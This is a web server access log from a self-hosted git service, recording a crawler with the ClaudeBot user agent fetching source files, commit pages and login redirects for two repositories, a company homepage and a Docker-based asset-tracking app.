git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" [Client 216.73.216.188] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js" [Client 216.73.216.188] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10947] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13158] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" [Client 216.73.216.188] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 9187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py?display=rendered" [Client 216.73.216.188] [Length 10961] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10907] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py?display=rendered" [Client 216.73.216.188] [Length 10970] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10909] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10914] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py?display=rendered" [Client 216.73.216.188] [Length 10934] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" [Client 216.73.216.188] [Length 15303] [Gzip 4.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile?display=rendered" [Client 216.73.216.188] [Length 10934] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fcomponents%2FHero.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fcomponents%2FContact.tsx" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fcomponents%2FHeader.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fcomponents%2FHeader.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fcomponents%2FChatBot.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fcomponents%2FHeader.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fcomponents%2FChatBot.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:06 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/dcsintegration.png?auto=format&q=80&w=800" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:06 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/dcsintegration.png?auto=format&q=80&w=1000" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fadf9a81cb0ea52c9fa32f352b5800e021665bb47%2Fasset_pilot_docker%2Fapp" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:06 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/$%7BgetInvestingUrl(symbol)%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fcomponents%2FFooter.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fadf9a81cb0ea52c9fa32f352b5800e021665bb47%2Fasset_pilot_docker%2Fstatic" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fcomponents%2FAbout.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" [Client 216.73.216.188] [Length 8147] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" [Client 216.73.216.188] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html?display=rendered" [Client 216.73.216.188] [Length 10929] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr 